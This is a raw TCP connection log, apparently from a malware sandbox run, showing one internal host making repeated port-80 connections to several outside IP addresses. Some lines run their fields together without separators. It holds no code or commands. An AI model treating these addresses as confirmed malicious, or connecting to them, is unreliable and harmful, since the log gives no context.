Nov 21, 2024 16:22:20.061219931 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:20.061455011 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:20.064071894 CET  49998  80  192.168.2.9  208.91.197.27
Nov 21, 2024 16:22:20.069643021 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:20.069708109 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:20.073008060 CET  49998  80  192.168.2.9  208.91.197.27
Nov 21, 2024 16:22:20.191287994 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:20.191354036 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:20.193154097 CET  49998  80  192.168.2.9  208.91.197.27
Nov 21, 2024 16:22:20.193800926 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:20.193891048 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:20.194044113 CET  49998  80  192.168.2.9  208.91.197.27
Nov 21, 2024 16:22:20.199167967 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:20.199311018 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:20.201184988 CET  49998  80  192.168.2.9  208.91.197.27
Nov 21, 2024 16:22:20.204574108 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:20.204643965 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:20.204822063 CET  49998  80  192.168.2.9  208.91.197.27
Nov 21, 2024 16:22:20.209655046 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:20.209723949 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:20.209899902 CET  49998  80  192.168.2.9  208.91.197.27
Nov 21, 2024 16:22:20.216188908 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:20.216203928 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:20.217012882 CET  49998  80  192.168.2.9  208.91.197.27
Nov 21, 2024 16:22:20.219966888 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:20.220010996 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:20.220272064 CET  49998  80  192.168.2.9  208.91.197.27
Nov 21, 2024 16:22:20.225110054 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:20.225214005 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:20.229064941 CET  49998  80  192.168.2.9  208.91.197.27
Nov 21, 2024 16:22:20.230243921 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:20.230334997 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:20.230458975 CET  49998  80  192.168.2.9  208.91.197.27
Nov 21, 2024 16:22:20.235414028 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:20.235563993 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:20.237051964 CET  49998  80  192.168.2.9  208.91.197.27
Nov 21, 2024 16:22:20.240565062 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:20.240655899 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:20.240861893 CET  49998  80  192.168.2.9  208.91.197.27
Nov 21, 2024 16:22:20.245702982 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:20.245923042 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:20.248956919 CET  49998  80  192.168.2.9  208.91.197.27
Nov 21, 2024 16:22:20.250874043 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:20.251024008 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:20.251147985 CET  49998  80  192.168.2.9  208.91.197.27
Nov 21, 2024 16:22:20.255996943 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:20.256195068 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:20.257766962 CET  49998  80  192.168.2.9  208.91.197.27
Nov 21, 2024 16:22:20.261137009 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:20.261233091 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:20.261511087 CET  49998  80  192.168.2.9  208.91.197.27
Nov 21, 2024 16:22:20.266308069 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:20.266477108 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:20.266633034 CET  49998  80  192.168.2.9  208.91.197.27
Nov 21, 2024 16:22:20.271495104 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:20.271733999 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:20.271936893 CET  49998  80  192.168.2.9  208.91.197.27
Nov 21, 2024 16:22:20.276568890 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:20.276679993 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:20.276803970 CET  49998  80  192.168.2.9  208.91.197.27
Nov 21, 2024 16:22:20.281694889 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:20.281790018 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:20.281963110 CET  49998  80  192.168.2.9  208.91.197.27
Nov 21, 2024 16:22:20.401000977 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:20.401175976 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:20.401365042 CET  49998  80  192.168.2.9  208.91.197.27
Nov 21, 2024 16:22:20.402765036 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:20.403561115 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:20.403654099 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:20.403816938 CET  49998  80  192.168.2.9  208.91.197.27
Nov 21, 2024 16:22:20.407639027 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:20.407757044 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:20.407869101 CET  49998  80  192.168.2.9  208.91.197.27
Nov 21, 2024 16:22:20.411909103 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:20.412064075 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:20.412062883 CET  49998  80  192.168.2.9  208.91.197.27
Nov 21, 2024 16:22:20.415517092 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:20.415641069 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:20.415750980 CET  49998  80  192.168.2.9  208.91.197.27
Nov 21, 2024 16:22:20.419397116 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:20.419508934 CET  49998  80  192.168.2.9  208.91.197.27
Nov 21, 2024 16:22:20.424861908 CET  49998  80  192.168.2.9  208.91.197.27
Nov 21, 2024 16:22:20.544378996 CET  80  49998  208.91.197.27  192.168.2.9
Nov 21, 2024 16:22:26.244883060 CET  49999  80  192.168.2.9  8.210.114.150
Nov 21, 2024 16:22:26.364494085 CET  80  49999  8.210.114.150  192.168.2.9
Nov 21, 2024 16:22:26.364793062 CET  49999  80  192.168.2.9  8.210.114.150
Nov 21, 2024 16:22:26.380956888 CET  49999  80  192.168.2.9  8.210.114.150
Nov 21, 2024 16:22:26.500552893 CET  80  49999  8.210.114.150  192.168.2.9
Nov 21, 2024 16:22:27.890753984 CET  49999  80  192.168.2.9  8.210.114.150
Nov 21, 2024 16:22:27.993083954 CET  80  49999  8.210.114.150  192.168.2.9
Nov 21, 2024 16:22:27.993190050 CET  80  49999  8.210.114.150  192.168.2.9
Nov 21, 2024 16:22:27.993220091 CET  49999  80  192.168.2.9  8.210.114.150
Nov 21, 2024 16:22:27.996958017 CET  49999  80  192.168.2.9  8.210.114.150
Nov 21, 2024 16:22:28.010611057 CET  80  49999  8.210.114.150  192.168.2.9
Nov 21, 2024 16:22:28.010715008 CET  49999  80  192.168.2.9  8.210.114.150
Nov 21, 2024 16:22:28.910310984 CET  50000  80  192.168.2.9  8.210.114.150
Nov 21, 2024 16:22:29.030141115 CET  80  50000  8.210.114.150  192.168.2.9
Nov 21, 2024 16:22:29.030203104 CET  50000  80  192.168.2.9  8.210.114.150
Nov 21, 2024 16:22:29.046588898 CET  50000  80  192.168.2.9  8.210.114.150
Nov 21, 2024 16:22:29.166389942 CET  80  50000  8.210.114.150  192.168.2.9
Nov 21, 2024 16:22:30.563729048 CET  50000  80  192.168.2.9  8.210.114.150
Nov 21, 2024 16:22:30.586858988 CET  80  50000  8.210.114.150  192.168.2.9
Nov 21, 2024 16:22:30.586890936 CET  80  50000  8.210.114.150  192.168.2.9
Nov 21, 2024 16:22:30.586957932 CET  50000  80  192.168.2.9  8.210.114.150
Nov 21, 2024 16:22:30.586957932 CET  50000  80  192.168.2.9  8.210.114.150
Nov 21, 2024 16:22:30.683284044 CET  80  50000  8.210.114.150  192.168.2.9
Nov 21, 2024 16:22:30.683614969 CET  50000  80  192.168.2.9  8.210.114.150
Nov 21, 2024 16:22:31.588870049 CET  50001  80  192.168.2.9  8.210.114.150
Nov 21, 2024 16:22:31.708898067 CET  80  50001  8.210.114.150  192.168.2.9
Nov 21, 2024 16:22:31.708973885 CET  50001  80  192.168.2.9  8.210.114.150
Nov 21, 2024 16:22:31.728079081 CET  50001  80  192.168.2.9  8.210.114.150
Nov 21, 2024 16:22:31.847590923 CET  80  50001  8.210.114.150  192.168.2.9
Nov 21, 2024 16:22:31.847620964 CET  80  50001  8.210.114.150  192.168.2.9
Nov 21, 2024 16:22:33.234517097 CET  50001  80  192.168.2.9  8.210.114.150
Nov 21, 2024 16:22:33.357692003 CET  80  50001  8.210.114.150  192.168.2.9
Nov 21, 2024 16:22:33.357759953 CET  50001  80  192.168.2.9  8.210.114.150
Nov 21, 2024 16:22:34.253504038 CET  50002  80  192.168.2.9  8.210.114.150
Nov 21, 2024 16:22:34.373428106 CET  80  50002  8.210.114.150  192.168.2.9
Nov 21, 2024 16:22:34.373712063 CET  50002  80  192.168.2.9  8.210.114.150
Nov 21, 2024 16:22:34.382836103 CET  50002  80  192.168.2.9  8.210.114.150
Nov 21, 2024 16:22:34.502424002 CET  80  50002  8.210.114.150  192.168.2.9
Nov 21, 2024 16:22:35.934837103 CET  80  50002  8.210.114.150  192.168.2.9
Nov 21, 2024 16:22:35.934892893 CET  80  50002  8.210.114.150  192.168.2.9
Nov 21, 2024 16:22:35.939882040 CET  50002  80  192.168.2.9  8.210.114.150
Nov 21, 2024 16:22:35.939882994 CET  50002  80  192.168.2.9  8.210.114.150
Nov 21, 2024 16:22:36.059736967 CET  80  50002  8.210.114.150  192.168.2.9
Nov 21, 2024 16:22:41.279201984 CET  50003  80  192.168.2.9  172.67.209.48
Nov 21, 2024 16:22:41.402344942 CET  80  50003  172.67.209.48  192.168.2.9
Nov 21, 2024 16:22:41.402447939 CET  50003  80  192.168.2.9  172.67.209.48
Nov 21, 2024 16:22:41.420078993 CET  50003  80  192.168.2.9  172.67.209.48
Nov 21, 2024 16:22:41.539803982 CET  80  50003  172.67.209.48  192.168.2.9
Nov 21, 2024 16:22:42.641472101 CET  80  50003  172.67.209.48  192.168.2.9
Nov 21, 2024 16:22:42.641494989 CET  80  50003  172.67.209.48  192.168.2.9
Nov 21, 2024 16:22:42.641674995 CET  50003  80  192.168.2.9  172.67.209.48
Nov 21, 2024 16:22:42.642147064 CET  80  50003  172.67.209.48  192.168.2.9
Nov 21, 2024 16:22:42.642509937 CET  80  50003  172.67.209.48  192.168.2.9
Nov 21, 2024 16:22:42.642704010 CET  50003  80  192.168.2.9  172.67.209.48
Nov 21, 2024 16:22:42.922195911 CET  50003  80  192.168.2.9  172.67.209.48
Nov 21, 2024 16:22:43.944901943 CET  50004  80  192.168.2.9  172.67.209.48
Nov 21, 2024 16:22:44.065036058 CET  80  50004  172.67.209.48  192.168.2.9
Nov 21, 2024 16:22:44.065388918 CET  50004  80  192.168.2.9  172.67.209.48
Nov 21, 2024 16:22:44.083441973 CET  50004  80  192.168.2.9  172.67.209.48
Nov 21, 2024 16:22:44.203090906 CET  80  50004  172.67.209.48  192.168.2.9
Nov 21, 2024 16:22:45.356559038 CET  80  50004  172.67.209.48  192.168.2.9
Nov 21, 2024 16:22:45.356585026 CET  80  50004  172.67.209.48  192.168.2.9
Nov 21, 2024 16:22:45.356630087 CET  50004  80  192.168.2.9  172.67.209.48
Nov 21, 2024 16:22:45.357093096 CET  80  50004  172.67.209.48  192.168.2.9
Nov 21, 2024 16:22:45.357137918 CET  50004  80  192.168.2.9  172.67.209.48
Nov 21, 2024 16:22:45.593967915 CET  50004  80  192.168.2.9  172.67.209.48
Nov 21, 2024 16:22:46.660904884 CET  50005  80  192.168.2.9  172.67.209.48
Nov 21, 2024 16:22:46.781374931 CET  80  50005  172.67.209.48  192.168.2.9
Nov 21, 2024 16:22:46.781752110 CET  50005  80  192.168.2.9  172.67.209.48
Nov 21, 2024 16:22:46.856908083 CET  50005  80  192.168.2.9  172.67.209.48
Nov 21, 2024 16:22:46.976762056 CET  80  50005  172.67.209.48  192.168.2.9
Nov 21, 2024 16:22:46.976804972 CET  80  50005  172.67.209.48  192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:48.037244081 CET8050005172.67.209.48192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:48.037290096 CET8050005172.67.209.48192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:48.037451029 CET5000580192.168.2.9172.67.209.48
                                                                                                                        Nov 21, 2024 16:22:48.038800001 CET8050005172.67.209.48192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:48.038897991 CET5000580192.168.2.9172.67.209.48
                                                                                                                        Nov 21, 2024 16:22:48.360896111 CET5000580192.168.2.9172.67.209.48
                                                                                                                        Nov 21, 2024 16:22:49.469237089 CET5000680192.168.2.9172.67.209.48
                                                                                                                        Nov 21, 2024 16:22:49.589411974 CET8050006172.67.209.48192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:49.589504957 CET5000680192.168.2.9172.67.209.48
                                                                                                                        Nov 21, 2024 16:22:49.609829903 CET5000680192.168.2.9172.67.209.48
                                                                                                                        Nov 21, 2024 16:22:49.729667902 CET8050006172.67.209.48192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:50.900764942 CET8050006172.67.209.48192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:50.900789976 CET8050006172.67.209.48192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:50.900922060 CET5000680192.168.2.9172.67.209.48
                                                                                                                        Nov 21, 2024 16:22:50.901216030 CET8050006172.67.209.48192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:50.901308060 CET5000680192.168.2.9172.67.209.48
                                                                                                                        Nov 21, 2024 16:22:50.903964043 CET5000680192.168.2.9172.67.209.48
                                                                                                                        Nov 21, 2024 16:22:51.023521900 CET8050006172.67.209.48192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:56.338609934 CET5000780192.168.2.9209.74.77.109
                                                                                                                        Nov 21, 2024 16:22:56.458450079 CET8050007209.74.77.109192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:56.460187912 CET5000780192.168.2.9209.74.77.109
                                                                                                                        Nov 21, 2024 16:22:56.474909067 CET5000780192.168.2.9209.74.77.109
                                                                                                                        Nov 21, 2024 16:22:56.594739914 CET8050007209.74.77.109192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:57.787565947 CET8050007209.74.77.109192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:57.787691116 CET8050007209.74.77.109192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:57.787740946 CET5000780192.168.2.9209.74.77.109
                                                                                                                        Nov 21, 2024 16:22:57.984829903 CET5000780192.168.2.9209.74.77.109
                                                                                                                        Nov 21, 2024 16:22:59.004297018 CET5000880192.168.2.9209.74.77.109
                                                                                                                        Nov 21, 2024 16:22:59.124380112 CET8050008209.74.77.109192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:59.124485016 CET5000880192.168.2.9209.74.77.109
                                                                                                                        Nov 21, 2024 16:22:59.142610073 CET5000880192.168.2.9209.74.77.109
                                                                                                                        Nov 21, 2024 16:22:59.262743950 CET8050008209.74.77.109192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:00.512301922 CET8050008209.74.77.109192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:00.512947083 CET8050008209.74.77.109192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:00.513467073 CET5000880192.168.2.9209.74.77.109
                                                                                                                        Nov 21, 2024 16:23:00.656927109 CET5000880192.168.2.9209.74.77.109
                                                                                                                        Nov 21, 2024 16:23:01.675240040 CET5000980192.168.2.9209.74.77.109
                                                                                                                        Nov 21, 2024 16:23:01.795125961 CET8050009209.74.77.109192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:01.795226097 CET5000980192.168.2.9209.74.77.109
                                                                                                                        Nov 21, 2024 16:23:01.810756922 CET5000980192.168.2.9209.74.77.109
                                                                                                                        Nov 21, 2024 16:23:01.930386066 CET8050009209.74.77.109192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:01.930490017 CET8050009209.74.77.109192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:03.175116062 CET8050009209.74.77.109192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:03.175162077 CET8050009209.74.77.109192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:03.175204992 CET5000980192.168.2.9209.74.77.109
                                                                                                                        Nov 21, 2024 16:23:03.312709093 CET5000980192.168.2.9209.74.77.109
                                                                                                                        Nov 21, 2024 16:23:04.332082033 CET5001080192.168.2.9209.74.77.109
                                                                                                                        Nov 21, 2024 16:23:04.452008963 CET8050010209.74.77.109192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:04.452114105 CET5001080192.168.2.9209.74.77.109
                                                                                                                        Nov 21, 2024 16:23:04.464939117 CET5001080192.168.2.9209.74.77.109
                                                                                                                        Nov 21, 2024 16:23:04.584744930 CET8050010209.74.77.109192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:05.724932909 CET8050010209.74.77.109192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:05.724993944 CET8050010209.74.77.109192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:05.725096941 CET5001080192.168.2.9209.74.77.109
                                                                                                                        Nov 21, 2024 16:23:05.727904081 CET5001080192.168.2.9209.74.77.109
                                                                                                                        Nov 21, 2024 16:23:05.847909927 CET8050010209.74.77.109192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:11.358422041 CET5001180192.168.2.9161.97.142.144
                                                                                                                        Nov 21, 2024 16:23:11.478346109 CET8050011161.97.142.144192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:11.478430033 CET5001180192.168.2.9161.97.142.144
                                                                                                                        Nov 21, 2024 16:23:11.495727062 CET5001180192.168.2.9161.97.142.144
                                                                                                                        Nov 21, 2024 16:23:11.615855932 CET8050011161.97.142.144192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:12.848418951 CET8050011161.97.142.144192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:12.848447084 CET8050011161.97.142.144192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:12.848645926 CET5001180192.168.2.9161.97.142.144
                                                                                                                        Nov 21, 2024 16:23:12.850280046 CET8050011161.97.142.144192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:12.850379944 CET5001180192.168.2.9161.97.142.144
                                                                                                                        Nov 21, 2024 16:23:13.000293970 CET5001180192.168.2.9161.97.142.144
                                                                                                                        Nov 21, 2024 16:23:14.021055937 CET5001280192.168.2.9161.97.142.144
                                                                                                                        Nov 21, 2024 16:23:14.146291971 CET8050012161.97.142.144192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:14.153067112 CET5001280192.168.2.9161.97.142.144
                                                                                                                        Nov 21, 2024 16:23:14.169044971 CET5001280192.168.2.9161.97.142.144
                                                                                                                        Nov 21, 2024 16:23:14.288733006 CET8050012161.97.142.144192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:15.442529917 CET8050012161.97.142.144192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:15.442589998 CET8050012161.97.142.144192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:15.442631006 CET8050012161.97.142.144192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:15.442631960 CET5001280192.168.2.9161.97.142.144
                                                                                                                        Nov 21, 2024 16:23:15.442676067 CET5001280192.168.2.9161.97.142.144
                                                                                                                        Nov 21, 2024 16:23:15.672111988 CET5001280192.168.2.9161.97.142.144
                                                                                                                        Nov 21, 2024 16:23:16.692951918 CET5001380192.168.2.9161.97.142.144
                                                                                                                        Nov 21, 2024 16:23:16.817971945 CET8050013161.97.142.144192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:16.818068981 CET5001380192.168.2.9161.97.142.144
                                                                                                                        Nov 21, 2024 16:23:16.833781958 CET5001380192.168.2.9161.97.142.144
                                                                                                                        Nov 21, 2024 16:23:16.960520029 CET8050013161.97.142.144192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:16.960566998 CET8050013161.97.142.144192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:18.152887106 CET8050013161.97.142.144192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:18.152946949 CET8050013161.97.142.144192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:18.153083086 CET5001380192.168.2.9161.97.142.144
                                                                                                                        Nov 21, 2024 16:23:18.233479977 CET8050013161.97.142.144192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:18.236877918 CET5001380192.168.2.9161.97.142.144
                                                                                                                        Nov 21, 2024 16:23:18.344161987 CET5001380192.168.2.9161.97.142.144
                                                                                                                        Nov 21, 2024 16:23:19.363152981 CET5001480192.168.2.9161.97.142.144
                                                                                                                        Nov 21, 2024 16:23:19.482825994 CET8050014161.97.142.144192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:19.482944012 CET5001480192.168.2.9161.97.142.144
                                                                                                                        Nov 21, 2024 16:23:19.493277073 CET5001480192.168.2.9161.97.142.144
                                                                                                                        Nov 21, 2024 16:23:19.612986088 CET8050014161.97.142.144192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:20.782006979 CET8050014161.97.142.144192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:20.782027006 CET8050014161.97.142.144192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:20.782042027 CET8050014161.97.142.144192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:20.782058954 CET8050014161.97.142.144192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:20.782174110 CET5001480192.168.2.9161.97.142.144
                                                                                                                        Nov 21, 2024 16:23:20.782174110 CET5001480192.168.2.9161.97.142.144
                                                                                                                        Nov 21, 2024 16:23:20.787079096 CET5001480192.168.2.9161.97.142.144
                                                                                                                        Nov 21, 2024 16:23:20.909197092 CET8050014161.97.142.144192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:26.927980900 CET5001580192.168.2.9185.27.134.206
                                                                                                                        Nov 21, 2024 16:23:27.048069000 CET8050015185.27.134.206192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:27.048156023 CET5001580192.168.2.9185.27.134.206
                                                                                                                        Nov 21, 2024 16:23:27.061866999 CET5001580192.168.2.9185.27.134.206
                                                                                                                        Nov 21, 2024 16:23:27.181935072 CET8050015185.27.134.206192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:28.410809994 CET8050015185.27.134.206192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:28.410867929 CET8050015185.27.134.206192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:28.410936117 CET5001580192.168.2.9185.27.134.206
                                                                                                                        Nov 21, 2024 16:23:28.579005003 CET5001580192.168.2.9185.27.134.206
                                                                                                                        Nov 21, 2024 16:23:29.597883940 CET5001680192.168.2.9185.27.134.206
                                                                                                                        Nov 21, 2024 16:23:29.717755079 CET8050016185.27.134.206192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:29.717869043 CET5001680192.168.2.9185.27.134.206
                                                                                                                        Nov 21, 2024 16:23:29.737035036 CET5001680192.168.2.9185.27.134.206
                                                                                                                        Nov 21, 2024 16:23:29.856868982 CET8050016185.27.134.206192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:31.088588953 CET8050016185.27.134.206192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:31.088802099 CET8050016185.27.134.206192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:31.088866949 CET5001680192.168.2.9185.27.134.206
                                                                                                                        Nov 21, 2024 16:23:31.250345945 CET5001680192.168.2.9185.27.134.206
                                                                                                                        Nov 21, 2024 16:23:32.269412041 CET5001780192.168.2.9185.27.134.206
                                                                                                                        Nov 21, 2024 16:23:32.389300108 CET8050017185.27.134.206192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:32.389451027 CET5001780192.168.2.9185.27.134.206
                                                                                                                        Nov 21, 2024 16:23:32.408984900 CET5001780192.168.2.9185.27.134.206
                                                                                                                        Nov 21, 2024 16:23:32.528709888 CET8050017185.27.134.206192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:32.528754950 CET8050017185.27.134.206192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:33.694612026 CET8050017185.27.134.206192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:33.694823027 CET8050017185.27.134.206192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:33.694881916 CET5001780192.168.2.9185.27.134.206
                                                                                                                        Nov 21, 2024 16:23:33.906560898 CET5001780192.168.2.9185.27.134.206
                                                                                                                        Nov 21, 2024 16:23:34.925988913 CET5001880192.168.2.9185.27.134.206
                                                                                                                        Nov 21, 2024 16:23:35.045823097 CET8050018185.27.134.206192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:35.045903921 CET5001880192.168.2.9185.27.134.206
                                                                                                                        Nov 21, 2024 16:23:35.057307959 CET5001880192.168.2.9185.27.134.206
                                                                                                                        Nov 21, 2024 16:23:35.177155972 CET8050018185.27.134.206192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:36.403729916 CET8050018185.27.134.206192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:36.404100895 CET8050018185.27.134.206192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:36.404201031 CET5001880192.168.2.9185.27.134.206
                                                                                                                        Nov 21, 2024 16:23:36.407860994 CET5001880192.168.2.9185.27.134.206
                                                                                                                        Nov 21, 2024 16:23:36.527575016 CET8050018185.27.134.206192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:41.900022030 CET5001980192.168.2.9104.21.62.184
                                                                                                                        Nov 21, 2024 16:23:42.019994020 CET8050019104.21.62.184192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:42.020165920 CET5001980192.168.2.9104.21.62.184
                                                                                                                        Nov 21, 2024 16:23:42.037542105 CET5001980192.168.2.9104.21.62.184
                                                                                                                        Nov 21, 2024 16:23:42.157202005 CET8050019104.21.62.184192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:43.312037945 CET8050019104.21.62.184192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:43.312063932 CET8050019104.21.62.184192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:43.312114954 CET5001980192.168.2.9104.21.62.184
Nov 21, 2024 16:23:43.312809944 CET | 80 | 50019 | 104.21.62.184 | 192.168.2.9
Nov 21, 2024 16:23:43.312855005 CET | 50019 | 80 | 192.168.2.9 | 104.21.62.184
Nov 21, 2024 16:23:43.547199965 CET | 50019 | 80 | 192.168.2.9 | 104.21.62.184
Nov 21, 2024 16:23:44.566102028 CET | 50020 | 80 | 192.168.2.9 | 104.21.62.184
Nov 21, 2024 16:23:44.685959101 CET | 80 | 50020 | 104.21.62.184 | 192.168.2.9
Nov 21, 2024 16:23:44.687146902 CET | 50020 | 80 | 192.168.2.9 | 104.21.62.184
Nov 21, 2024 16:23:44.702689886 CET | 50020 | 80 | 192.168.2.9 | 104.21.62.184
Nov 21, 2024 16:23:44.822560072 CET | 80 | 50020 | 104.21.62.184 | 192.168.2.9
Nov 21, 2024 16:23:46.146347046 CET | 80 | 50020 | 104.21.62.184 | 192.168.2.9
Nov 21, 2024 16:23:46.146656990 CET | 80 | 50020 | 104.21.62.184 | 192.168.2.9
Nov 21, 2024 16:23:46.146692038 CET | 80 | 50020 | 104.21.62.184 | 192.168.2.9
Nov 21, 2024 16:23:46.146753073 CET | 50020 | 80 | 192.168.2.9 | 104.21.62.184
Nov 21, 2024 16:23:46.146864891 CET | 50020 | 80 | 192.168.2.9 | 104.21.62.184
Nov 21, 2024 16:23:46.219103098 CET | 50020 | 80 | 192.168.2.9 | 104.21.62.184
Nov 21, 2024 16:23:47.246718884 CET | 50021 | 80 | 192.168.2.9 | 104.21.62.184
Nov 21, 2024 16:23:47.366437912 CET | 80 | 50021 | 104.21.62.184 | 192.168.2.9
Nov 21, 2024 16:23:47.366518021 CET | 50021 | 80 | 192.168.2.9 | 104.21.62.184
Nov 21, 2024 16:23:47.383749008 CET | 50021 | 80 | 192.168.2.9 | 104.21.62.184
Nov 21, 2024 16:23:47.503520966 CET | 80 | 50021 | 104.21.62.184 | 192.168.2.9
Nov 21, 2024 16:23:47.503573895 CET | 80 | 50021 | 104.21.62.184 | 192.168.2.9
